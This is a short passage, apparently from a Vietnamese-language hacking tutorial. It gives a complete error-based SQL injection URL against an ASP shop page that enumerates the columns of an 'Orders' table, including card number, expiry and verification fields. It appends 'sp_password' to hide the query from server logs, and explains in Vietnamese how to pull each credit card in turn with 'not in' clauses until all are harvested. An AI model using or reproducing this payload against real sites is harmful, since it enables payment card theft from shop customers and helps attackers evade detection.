... sau:http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('Orders')%20and%20column_name%20not%20in%20('OrderID','DateCreated','MemberID','ShippingMethod','Company','FirstName','LastName','Address1','Address2','City','State','Zip','ForeignAddress','Country','Phone','Fax','Email','CardName','CardType','CardNumber','ExpirationDate','CardAddress','CardZip','ShippingAddress1','SubTotal','Discount','DiscountDescription','Tax','Shipping','OrderTotal','PONumber','ResaleNumber','Handling','Comments','Referer','StoreName','ShippingCompany','ShippingFirstName','ShippingLastName','ShippingAddress2','ShippingCity','ShippingState','ShippingZip','ShippingForeignAddress','ShippingCountry','ShippingPhone','ShippingFax','CardVerification','CardVerificationNone','CardVerificationRead','PhoneOrder','FREEShippingMethod'))) ... sp_passwordlay' cc thu 2 thi ta them vao o sao from orders where cardnumber not in('so card dau tien')va lan luot lay het cac credit card co tren do'nhu cai shop o tren thi de dung cho ... 